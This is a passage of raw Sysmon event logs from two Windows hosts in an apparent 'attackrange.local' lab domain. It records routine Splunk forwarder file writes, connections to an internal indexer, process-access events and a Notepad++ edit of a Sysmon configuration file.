Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F9D572658D8664E5C859EDB228C5D30,SHA256=5022B34EA681B26678E06D375B03E2F61D0F87D582E8A4D06AE3D684EDE8F898,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807889Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:19.122{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6C9B788D65CCEA1434B4399B497BDAD,SHA256=36E30CAA57986579FD9048C34116953191CA4A39FD0AB0339EF27C7F762DE903,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049672Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:20.587{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1F099CE74B360E8935A5B6C2E223BFE,SHA256=129F0A7A936568414798CE6B1B559EF1E8682FC60181BA7A99ADF2F4829313A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807891Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:20.544{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807890Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:20.138{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D43B14EC69649F7F92E8942674FCCB5,SHA256=99FFC05260726430DC42AAC2AD3E3D32678FFA983E6244D984BA6DA5861AA72C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049676Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:21.970{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_075421MD5=FB65D6C1F8C0BBD38377AE359F2DD61A,SHA256=3BD9132356DA74C4826ED4866ECB3DDF33ADCB463C274422A80FF45C746C36EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049675Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:21.970{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Program Files\ansible\AttackRangeSysmon.xmlMD5=BEC53E6D4BE59D23EEBC911FA615E46C,SHA256=E223AAC236A5F16CA5D04404C205699C803B34647119E8DB1D59D561D10B6E89,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049674Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:21.855{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\session.xmlMD5=7CDCC9313E6EDF43A3E6CF24C9909BC7,SHA256=EA63701E646483798C864221911377F4D66D4907C318AEE957898E42494C11E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049673Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:21.602{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76D87DB9A2FBB95CC1467C78C46D7ADF,SHA256=5951F8114846241FF4E9AB67BD73FB1A2979E56E0C10604A3F57489D9387DB70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807892Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:21.138{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7A899BA2E30E86A6EC46283B870B137,SHA256=27E84164FC5AC9BF17AD8C9A0CD0FBECD1AADA2B2D9C57B8AA83A204BD5E0084,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049680Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:22.870{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0439134699D232368B70A37C122110DA,SHA256=8847F706C3A3861B29FBD450CF3C0E23B4EFDDC0D3CEDF5ED26748BEE52770C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049679Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:22.870{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6D216B6F63BFA25564000702778FAC4A,SHA256=EDAE2B18AF91B6BDDA661C9529E291355D468ECFC0EDE1F17598169CA4DAE77D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049678Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:22.636{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65EB16BAE7A189CAD0F434D668588257,SHA256=5E3C851A4DD00CAE8A3DB67BE6D27FB5DB2271954D50489746734A733CD70F5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807895Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:22.200{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F2E59950568962CB78D379F88E2F96E,SHA256=1DFA0A78C69ABF26F2DB5BCF4446986031F8703E4860CA7228A1E370201290D6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049677Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:14.596{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51058-false10.0.1.12-8000- 354300x8000000000000000807894Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:20.664{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57292-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 354300x8000000000000000807893Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:20.255{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57291-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001049681Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:23.669{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F330D62CCE5C5CD6DBBE8BD91A7ED6EC,SHA256=643209A79E9E2FCFF1516652C905C5004761AC1DE909C612330627A6202A67A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807896Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:23.216{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A52473235AD74A54E6DDE25C92C2F0E6,SHA256=8B4A7D5865018333C7057549EC2B72F0C1DF5DAB43ADAB01DACA612872DA59C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049682Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:24.684{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D609692D57776E91E87A69B8DD8D7D0,SHA256=9A7D6C3EF97395A363F90152F8F4A09F880D7E05AD19EAA96831A2675F7A4DF1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807911Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.450{0C1E0330-F530-60EB-8179-00000000D001}18802548C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807910Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.310{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F530-60EB-8179-00000000D001}1880C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807909Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.310{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807908Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.310{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807907Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.310{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807906Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.310{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807905Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.310{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807904Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.310{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807903Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.310{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807902Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.310{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807901Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.310{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807900Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.310{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F530-60EB-8179-00000000D001}1880C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807899Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.294{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F530-60EB-8179-00000000D001}1880C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807898Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.295{0C1E0330-F530-60EB-8179-00000000D001}1880C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807897Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.232{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=284E2530E773F59A75FAE4E52203BC6C,SHA256=EC4EEC3820014CEC75CE7EB1463536C09B2B3D5F61FCD73EFFBB518C756AB4D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049683Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:25.699{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEB7D43BCD9678C942163AF7E460C1E4,SHA256=E5CE744D06E492B3CB908D52806E08DFDDC7D6229716D024FD72005D399F4D43,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807940Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:25.669{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F531-60EB-8379-00000000D001}852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807939Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:25.669{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807938Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 